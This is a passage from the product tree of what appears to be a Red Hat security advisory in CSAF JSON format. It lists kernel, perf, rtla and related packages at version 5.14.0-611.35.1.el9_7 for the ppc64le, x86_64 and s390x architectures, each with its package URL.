"product_id": "kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"product": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_id": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@5.14.0-611.35.1.el9_7?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "perf-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "perf-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "perf-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rv-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "rv-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "rv-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-x86_64@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-core@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules-extra@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-uki-virt@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-core@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-modules-extra@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-uki-virt-addons@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-libs-devel@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-core@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-core@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product": {
"name": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product_id": "kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@5.14.0-611.35.1.el9_7?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-devel-matched@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-devel-matched@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-devel@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-devel-matched@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "perf-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "perf-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "perf-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rtla-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "rtla-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rtla@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rv-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "rv-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "rv-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rv@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-debuginfo@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debuginfo-common-s390x@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-tools-debuginfo@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-zfcpdump-debuginfo@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/libperf-debuginfo@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/perf-debuginfo@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-perf-debuginfo@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-core@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-core@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-debug-modules@5.14.0-611.35.1.el9_7?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"product": {
"name": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_id": "kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"product_identification_helper": {
